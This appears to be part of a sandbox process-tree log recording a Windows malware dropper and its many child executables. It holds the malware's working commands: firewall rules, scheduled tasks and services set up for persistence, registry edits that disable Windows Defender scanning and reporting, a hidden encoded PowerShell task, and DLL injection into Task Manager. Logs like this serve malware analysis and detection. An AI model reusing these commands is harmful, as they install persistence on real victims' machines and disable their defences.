- Suspicious use of AdjustPrivilegeToken
PID:2676

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
PID:4164

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
2⤵
- Executes dropped EXE
PID:4236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 328
3⤵
- Program crash
PID:1840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 332
3⤵
- Program crash
PID:3700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 332
3⤵
- Program crash
PID:3352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 664
3⤵
- Program crash
PID:804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 664
3⤵
- Program crash
PID:1244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 664
3⤵
- Program crash
PID:3996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 724
3⤵
- Program crash
PID:940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 752
3⤵
- Program crash
PID:4480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 724
3⤵
- Program crash
PID:1736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 788
3⤵
- Program crash
PID:2244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 708
3⤵
- Program crash
PID:3988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 716
3⤵
- Program crash
PID:1540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 600
3⤵
- Program crash
PID:2060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 628
3⤵
- Program crash
PID:1156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 780
3⤵
- Program crash
PID:912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 708
3⤵
- Program crash
PID:1132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 848
3⤵
- Program crash
PID:1640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 772
3⤵
- Program crash
PID:4840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 884
3⤵
- Program crash
PID:1816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 604
3⤵
- Program crash
PID:1840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 876
3⤵
- Program crash
PID:3628

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:3948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 292
4⤵
- Program crash
PID:4316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 296
4⤵
- Program crash
PID:2156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 316
4⤵
- Program crash
PID:4532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 636
4⤵
- Program crash
PID:4660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 636
4⤵
- Program crash
PID:4696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 692
4⤵
- Program crash
PID:2088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 692
4⤵
- Program crash
PID:4468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 636
4⤵
- Program crash
PID:4972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 728
4⤵
- Program crash
PID:1280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 588
4⤵
- Program crash
PID:2180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 768
4⤵
- Program crash
PID:1760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 824
4⤵
- Program crash
PID:3940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 828
4⤵
- Program crash
PID:2976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 800
4⤵
- Program crash
PID:4236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 828
4⤵
- Program crash
PID:3308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 888
4⤵
- Program crash
PID:1904

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
- Suspicious use of WriteProcessMemory
PID:1564

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
PID:8

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /202-202
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 328
5⤵
- Program crash
PID:4800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 332
5⤵
- Program crash
PID:5052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 332
5⤵
- Program crash
PID:3148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 664
5⤵
- Program crash
PID:3460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 700
5⤵
- Program crash
PID:3164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 700
5⤵
- Program crash
PID:4088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 728
5⤵
- Program crash
PID:396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 736
5⤵
- Program crash
PID:1140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 828
5⤵
- Program crash
PID:5104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 616
5⤵
- Program crash
PID:4424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 644
5⤵
- Program crash
PID:2316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 876
5⤵
- Program crash
PID:4656

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:5012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 884
5⤵
- Program crash
PID:4620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 884
5⤵
- Program crash
PID:2292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 884
5⤵
- Program crash
PID:1712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 992
5⤵
- Program crash
PID:1644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 1048
5⤵
- Program crash
PID:4516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 964
5⤵
- Program crash
PID:4856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 880
5⤵
- Program crash
PID:1088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 988
5⤵
- Program crash
PID:988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 1080
5⤵
- Program crash
PID:3892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 1136
5⤵
- Program crash
PID:5064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 1120
5⤵
- Program crash
PID:4784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 1152
5⤵
- Program crash
PID:5032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 1088
5⤵
- Program crash
PID:4980

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:2368

C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
"C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
2⤵
- Executes dropped EXE
PID:2472

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5100

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4652

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4972

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1424

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:1072

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:912

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1256

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4320

C:\Users\Admin\Pictures\Adobe Films\ZzKf08aJT65s8mbuXkOfj5s2.exe
"C:\Users\Admin\Pictures\Adobe Films\ZzKf08aJT65s8mbuXkOfj5s2.exe"
3⤵
- Executes dropped EXE
PID:400

C:\Users\Admin\Pictures\Adobe Films\AowVglzgHgeYTJHJgd0EbCha.exe
"C:\Users\Admin\Pictures\Adobe Films\AowVglzgHgeYTJHJgd0EbCha.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4924 -s 624
4⤵
- Program crash
PID:3544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4924 -s 632
4⤵
PID:336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4924 -s 656
4⤵
PID:5776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4924 -s 812
4⤵
PID:3464

C:\Users\Admin\Pictures\Adobe Films\pAI3i8q2x5MNuhj3LsMeADO2.exe
"C:\Users\Admin\Pictures\Adobe Films\pAI3i8q2x5MNuhj3LsMeADO2.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:3672

C:\Users\Admin\Pictures\Adobe Films\pAI3i8q2x5MNuhj3LsMeADO2.exe
"C:\Users\Admin\Pictures\Adobe Films\pAI3i8q2x5MNuhj3LsMeADO2.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1664 -s 564
5⤵
PID:4092

C:\Users\Admin\Pictures\Adobe Films\2TUXRt3nRuL7ml_FpKXdseKN.exe
"C:\Users\Admin\Pictures\Adobe Films\2TUXRt3nRuL7ml_FpKXdseKN.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 460
4⤵
- Program crash
PID:2244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 480
4⤵
PID:3632

C:\Users\Admin\Pictures\Adobe Films\jWEXdkAjoR3u59hYM3ZIoe4y.exe
"C:\Users\Admin\Pictures\Adobe Films\jWEXdkAjoR3u59hYM3ZIoe4y.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3780

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\bysrfvet\
4⤵
PID:3700

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\bpqsuzmp.exe" C:\Windows\SysWOW64\bysrfvet\
4⤵
PID:4260

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description bysrfvet "wifi internet conection"
4⤵
PID:60

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create bysrfvet binPath= "C:\Windows\SysWOW64\bysrfvet\bpqsuzmp.exe /d\"C:\Users\Admin\Pictures\Adobe Films\jWEXdkAjoR3u59hYM3ZIoe4y.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:3080

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start bysrfvet
4⤵
PID:4424

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:4256

C:\Users\Admin\izacevkd.exe
"C:\Users\Admin\izacevkd.exe" /d"C:\Users\Admin\Pictures\Adobe Films\jWEXdkAjoR3u59hYM3ZIoe4y.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2352

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\drsuwbor.exe" C:\Windows\SysWOW64\bysrfvet\
5⤵
PID:540

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config bysrfvet binPath= "C:\Windows\SysWOW64\bysrfvet\drsuwbor.exe /d\"C:\Users\Admin\izacevkd.exe\""
5⤵
PID:4532

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start bysrfvet
5⤵
PID:4388

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
5⤵
PID:4344

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0850.bat" "
5⤵
PID:3896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 1052
5⤵
PID:5300

C:\Users\Admin\Pictures\Adobe Films\eP_kSFEt4D7h8o3_SYTwq4Nt.exe
"C:\Users\Admin\Pictures\Adobe Films\eP_kSFEt4D7h8o3_SYTwq4Nt.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4284

C:\Users\Admin\AppData\Local\Temp\7zS352D.tmp\Install.exe
.\Install.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3044

C:\Users\Admin\AppData\Local\Temp\7zS67C6.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1632

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
6⤵
PID:2516

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
7⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:1844

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
8⤵
PID:5588

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
8⤵
PID:5784

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
6⤵
PID:4288

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
7⤵
PID:5152

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
8⤵
PID:5220

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
8⤵
PID:5380

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gxAkmkjlv" /SC once /ST 00:19:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
6⤵
- Creates scheduled task(s)
PID:5580

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gxAkmkjlv"
6⤵
PID:5756

C:\Users\Admin\Pictures\Adobe Films\MpFAZGCy3faZVe9SqA6gAAbh.exe
"C:\Users\Admin\Pictures\Adobe Films\MpFAZGCy3faZVe9SqA6gAAbh.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:3884

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:3584

C:\Users\Admin\Pictures\Adobe Films\m9dvpW0hMK6oukeDQbAR3VQc.exe
"C:\Users\Admin\Pictures\Adobe Films\m9dvpW0hMK6oukeDQbAR3VQc.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:2064

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:876

C:\Users\Admin\Pictures\Adobe Films\LQ8EGMztPvcf7Cm9AwCL3jwO.exe
"C:\Users\Admin\Pictures\Adobe Films\LQ8EGMztPvcf7Cm9AwCL3jwO.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2712 -s 920
4⤵
PID:2076

C:\Users\Admin\Pictures\Adobe Films\L5GWogrRjr3mIsto0YlJMZtJ.exe
"C:\Users\Admin\Pictures\Adobe Films\L5GWogrRjr3mIsto0YlJMZtJ.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:364

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:2404

C:\Users\Admin\Pictures\Adobe Films\KkiAf2kCNTKXF1pLiOaEWg8C.exe
"C:\Users\Admin\Pictures\Adobe Films\KkiAf2kCNTKXF1pLiOaEWg8C.exe"
3⤵
- Executes dropped EXE
PID:1132

C:\Users\Admin\Pictures\Adobe Films\AgZwXYH5B2w8JzpCM8z4awg0.exe
"C:\Users\Admin\Pictures\Adobe Films\AgZwXYH5B2w8JzpCM8z4awg0.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4468

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
4⤵
- Blocklisted process makes network request
PID:2772

C:\Users\Admin\Pictures\Adobe Films\zjcg2G7_6flQxpQGdnayMtzP.exe
"C:\Users\Admin\Pictures\Adobe Films\zjcg2G7_6flQxpQGdnayMtzP.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:4064

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:4000

C:\Users\Admin\Pictures\Adobe Films\GeOTKmxtuLZW2GHDrc8f4Psk.exe
"C:\Users\Admin\Pictures\Adobe Films\GeOTKmxtuLZW2GHDrc8f4Psk.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:2800

C:\Users\Admin\Pictures\Adobe Films\Bew94hn6SQH_kEJ2Qr1S4hVc.exe
"C:\Users\Admin\Pictures\Adobe Films\Bew94hn6SQH_kEJ2Qr1S4hVc.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:4668

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:4708

C:\Users\Admin\Pictures\Adobe Films\Sea44K_kRZ3We5R5eaMK9iKZ.exe
"C:\Users\Admin\Pictures\Adobe Films\Sea44K_kRZ3We5R5eaMK9iKZ.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:1540

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
4⤵
PID:1748

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:1288

C:\Users\Admin\Pictures\Adobe Films\Uj5Grqe1heyitIakbRjlVE_M.exe
"C:\Users\Admin\Pictures\Adobe Films\Uj5Grqe1heyitIakbRjlVE_M.exe"
3⤵
- Executes dropped EXE
PID:3988

C:\Users\Admin\Pictures\Adobe Films\2DJKIPWfJHodIWIFhg_UsFQg.exe
"C:\Users\Admin\Pictures\Adobe Films\2DJKIPWfJHodIWIFhg_UsFQg.exe"
3⤵
- Executes dropped EXE
PID:4532

C:\Users\Admin\AppData\Local\Temp\d34c604b-f975-484f-bf57-88c388ec6bb6.exe
"C:\Users\Admin\AppData\Local\Temp\d34c604b-f975-484f-bf57-88c388ec6bb6.exe"
4⤵
- Executes dropped EXE
PID:4424

C:\Users\Admin\Pictures\Adobe Films\4ImnAAlTfIviXcF8sF3kuGjm.exe
"C:\Users\Admin\Pictures\Adobe Films\4ImnAAlTfIviXcF8sF3kuGjm.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:4108

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im 4ImnAAlTfIviXcF8sF3kuGjm.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\4ImnAAlTfIviXcF8sF3kuGjm.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:5724

C:\Windows\SysWOW64\taskkill.exe
taskkill /im 4ImnAAlTfIviXcF8sF3kuGjm.exe /f
5⤵
- Kills process with taskkill
PID:5220

C:\Users\Admin\Pictures\Adobe Films\yilMEqc2OnCuWXggZ5Wvqspr.exe
"C:\Users\Admin\Pictures\Adobe Films\yilMEqc2OnCuWXggZ5Wvqspr.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:4396

C:\Users\Admin\Documents\Q220XCw5sxrXeHH2DwwbnIaK.exe
"C:\Users\Admin\Documents\Q220XCw5sxrXeHH2DwwbnIaK.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:4136

C:\Users\Admin\Pictures\Adobe Films\HhSCbTXMFQjxkk_Tdl64t7sJ.exe
"C:\Users\Admin\Pictures\Adobe Films\HhSCbTXMFQjxkk_Tdl64t7sJ.exe"
5⤵
- Executes dropped EXE
PID:2580

C:\Users\Admin\Pictures\Adobe Films\EtaKN4_0pP7Q67ZzHQr5Hnyc.exe
"C:\Users\Admin\Pictures\Adobe Films\EtaKN4_0pP7Q67ZzHQr5Hnyc.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 708 -s 652
6⤵
PID:4856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 708 -s 760
6⤵
PID:5832

C:\Users\Admin\Pictures\Adobe Films\quEATuAAYyWo343c1CUsjvKL.exe
"C:\Users\Admin\Pictures\Adobe Films\quEATuAAYyWo343c1CUsjvKL.exe"
5⤵
- Executes dropped EXE
